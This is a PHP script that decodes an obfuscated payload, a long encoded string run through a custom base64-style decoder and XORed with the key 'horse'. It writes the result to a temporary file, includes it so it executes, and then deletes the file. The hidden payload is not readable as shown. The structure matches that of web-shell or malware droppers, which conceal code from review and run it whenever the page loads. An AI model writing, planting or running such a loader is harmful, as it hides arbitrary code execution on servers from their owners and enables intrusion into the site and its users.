<?php
$encrypted = 'VFACGxVlZVYVDAQKUk5FARwBFhFASy00IDw0VQMEHAdVLkxIUFIBAAkDAhIRAEdWLCItOylUFQkbGlQ4QU9IUwsdAx5IaGJLFhwGHQIXHRE6AB0HRVVPABYEBB8TBw1ACBcHBh8LWlpMU2J4fm8BCVJbREwJGx8ASBMOU0QBHC0VDAQKWlcDAQMXWkxIFH95RUhPUhcMDUdVGgsLAAABAAsbUhUMBApVWl5lZQ9-b2VlVh4AGxwTFABIUlJUQlNieH5vAQlSW0E3PDchMy09KVQ3LT4nNjY8MD82MSAgNlQ4SFJPTkVPPz0gMU9GUghoYk9SU0UBCVJbDBscFwdNTDAiPDY8NFUQCgYbFx0RTzJbWkUTYnhTRUhPUlNFSEscFhIrABwHAAYbUk5FTDAiPDY8NFUQCgYbFx0RTzJJfm9IT1JTRUhPUhUMBAotAxAcMBEcCxwKHAcWQEsUGgkNQ1JXCw0YMRwLHAocB0xTYnhTRUhPUlNFSEsfFhYbDhUWRVVPUAAEHgoWSEVKVH95RUhPUg5oYmJ4U0VITxsVRUBOFx4VHBZaVzo4ICEnPk8BFwQ6DgYeFgsJAhdUOEFGUghoYk9SU0VIT1JTQQYKBT0EBQpSTkUKDgEWCwkCF1tBNz89IDEzSBwWEjcJGx8ABg4fFkI1Rkl-b0hPUlNFSE9SVwsNGCISEQBPT1MBAR0cEggNR1YVDAQKW1NLSCs7ISArOz0hPDc8NyMkOi4mPDdIQVJXCw0YPBIIDVR_eWhiT1JTRUhPUlMMDk9aVwsNGCISEQBPU05YSEsUGgkNT1RVRUkJGx8ANwoKGhYcHFpXCw0YIhIRAEZbUx5lZVJTRUhPUlNFSE9SUwwOT1oBAAYOHxZNTAkbHwBET1YdAB8_EwcNQUZSCGhiT1JTRUhPUlNFSE9SU0VIT1YVDAQKUk5FGgoTHxUJGxpbQQYKBSMEHAdbSGhiT1JTRUhPUlNFSE9SU0VIT1YeABscExQASEFPU0dIHRcdBAUKFkhHU2J4U0VIT1JTRUhPUlNFFU8XHxYNTwl-b0hPUlNFSE9SU0VIT1JTRUhLHxYWGw4VFkVGUlJRRQ4OGx8ADE8GHEUaChwSCA1UUEhoYk9SU0VIT1JTRUhPUg5oYk9SU0VIT1JTGGVlUlNFSBJ_eRhlZX95QQsAHAcABhtSTkUOBh4WOg8KBiwGBwEGFgscHFpXAwEDF1peZWVNTWhiYnhPRCwgMSc8OCpSGxEFA0x-b1QHBh4JVmJ4Tw0NDhZNaGJPUlNFVAIXBwRIDBoSFxsKBk5HPTs0Xl1KUX95RUhPUk8WHBYeFltlZVJTRUhPUlNFHAoKBwQaChNTHmVlUlNFSE9SU0VIT1JTEgELBhtfSFxCVl5lZVJTRUhPUlNFSE9SUw0NBhUbEVJPRkMTAFR_eUVIT1JTRUhPUlNFSA0TEA4PHR0GCwxCERwJBx1IU0ZaDUARVwpUf3lFSE9SU0VIT1JTRUgMHR8KGlVSUAMJCUIWU1NieFNFSE9SU0VIT1JTRQoAABcAGlVSQhUQTwEcCQELUlBRXFtJfm9IT1JTRUhPUlNFSE8CEgEMBhwUX0heQgMdU2J4U0VIT1JTRUhPUlNFDgAcB0gODh8aCRFVUh4KBgABAwQLCkl-b0hPUlNFSE9SU0VITxQcCxxCARofDVVSQlEYF0l-b0hPUlNFSE9SDmhiT1JTRUhPUlNLBQoBAAQPClIIaGJPUlNFSE9SU0VIT1IQCgQAAElFBAYVGxEPHRcWC1NieFNFSE9SU0VIT1JTRRgOFhcMBghIU1RYHwpIaGJPUlNFSE9SUxhlZVJTRUhPUlNFChoGBwoGTwl-b0hPUlNFSE9SU0VITxASBgMIABwQBgtIUwcEDhEYXmVlUlNFSE9SU0VIT1JTBgcDHQFfSEwUFQNTYnhTRUhPUlNFSE9SU0UYDhYXDAYISFNQGBdSSxUQVH95RUhPUlNFSE9SU0VIDR0BAQ0dSFMLBwEXSGhiT1JTRUhPUlNFSE9SEBAaHB0BX0gfHRoLHAoASGhiT1JTRUhPUlNFSE9SHgQaCBsdSAQKFAdfSF5CAx1TYnhTRUhPUlNFSE9SU0UKAAAXABpCABIBARoBSUVZHwpIaGJPUlNFSE9SU0VIT1IVCgYbXxUEBQYeCl9ISDEcEBoGFwFFJgoFVElILB0GFwEKAF9FBQAcHBYYDhEWXmVlUlNFSE9SU0VIT1JTAwcBBl4WARUXSUVZX0JWXmVlUlNFSE9SU0UVYnhTRUhPUlNFSA0HBxEHAUgbCh4KAFMeZWVSU0VIT1JTRUhPUlMHCQwZFBcHGhwXX0hMREVTU2J4U0VIT1JTRUgSf3lFSE9SU0VIT1wVDAQKNxcMHAoAUx5lZVJTRUhPUlNFSE9SUxENFwZeBAQGFR1fSAwXHRENHUl-b0hPUlNFSE9SU0VITxEcCQcdSFNGDg4UQwBeVH95RUhPUlNFSE8Pfm9IT1JTRUhPUl0NDQ4WFhdIFH95RUhPUlNFSE9SU0VICR0dEUUJEx4MBBZIU0IrAAcBDA0dUj0AH0heUyYHGgAaABpDUh4KBgABAwQLCkl-b0hPUlNFSE9SU0VITxQcCxxCARofDVVSQlFYSkl-b0hPUlNFSE9SDmhiT1JTRUhPUlMMBh8HBz4cFgIWWEobFwsRSjJSCGhiT1JTRUhPUlNFSE9SEQQLBBUBCh0BFl4GBwMdAV9ITEMWVA1eF0hoYk9SU0VIT1JTRUhPUhAKBAAASUVLCRMVVQ1ZSX5vSE9SU0VIT1JTRUhPEBwXDAoASUVZHwpTFgcDGxdFS1pHRl5lZVJTRUhPUlNFSE9SUxUJCxYaCw9VUkcVEFR_eUVIT1JTRUhPUlNFSAkdHRFFCRMeDAQWSFMIBwEdABUJDBdIaGJPUlNFSE9SU0VIT1IeBBoIGx1IBAoUB19IXkIDHVNieFNFSE9SU0VIT1JTRR8GFgcNUk9AQ1UYF0l-b0hPUlNFSE9SDmhiT1JTRVRAAQccBApMfm9UQBoWBAxRf3lZCgAWCltlZVJTRUhTFhoTSAweEhYbUlAVDAQKNxcMHAoAUVtlZVJTRUhPUlNFVAkdAQhIAhcHDQcLT1E1JzwmUVtlZVJTRUhPUlNFSE9SU1kMBgRTBgQOAQBYSgcXEgENHVBNaGJPUlNFSE9SU0VIT1JTRUhPThoLGBoGUxERHxdORxwKCgdHSAETHgBVTRwWEjcJGx8ABg4fFkdIGRMfEA1SUE9aGAcCUwALBx1TDRwCHgAVDQwbEgkLBxMBFkANEwAABg4fFk1MCRsfAEFGSVNaVk1Mfm9IT1JTRUhPUlNFSE9SU0VIUxAGERwAHFMRER8XTkcbGhAeDBxNTCAEHgpOXAcdGwYcC1ZieFNFSE9SU0VIT1JTRUhPUlNZVx8aA0UBCVJbRA0CAgccQEsfFhYbDhUWTEFPFxANB09VTwEBGVIQCQkcAU5HBQoBAAQPClBNQkhBUlcIDRwBEgINT1xTQlRAFhoTVkhJU1pWYnhTRUhPUlNFSE9SU0VUQBYaE1ZieFNFSE9SU0VIT1JTRVQNAE1oYk9SU0VIT1JTRUhPUk8RDRcGEhcNDlIdBAUKT1EGBwEGFgscTUxPWhgHAlMACwcdUw0cAh4AFQ0MGxIJCwcTARZASxEcCxwKHAdMU09NTVlHGxcLEQkdFxJbZWVSU0VIT1JTRVRAFBwXBVF_eUVIT1JPSgwGBE1oYlNdEQoMFkx-b1RAGgcIBFF_eQ';
if (!function_exists('pelican')) {
    function pelican($data, $key) {
        $alphabet = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-_';
        $bin = '';
        for ($i = 0; $i < strlen($data); $i++) {
            $index = strpos($alphabet, $data[$i]);
            $bin .= str_pad(decbin($index), 6, '0', STR_PAD_LEFT);
        }

        $bytes = '';
        for ($i = 0; $i < strlen($bin); $i += 8) {
            $chunk = substr($bin, $i, 8);
            if (strlen($chunk) < 8) break; // если меньше 8 бит — игнорируем
            $bytes .= chr(bindec($chunk));
        }

        $res = '';
        $klen = strlen($key);
        for ($i = 0; $i < strlen($bytes); $i++) {
            $res .= $bytes[$i] ^ $key[$i % $klen];
        }
        return $res;
    }
}

file_put_contents($tmp = tempnam(sys_get_temp_dir(), 'shf_'), pelican($encrypted, 'horse'));
include $tmp;
unlink($tmp);

?>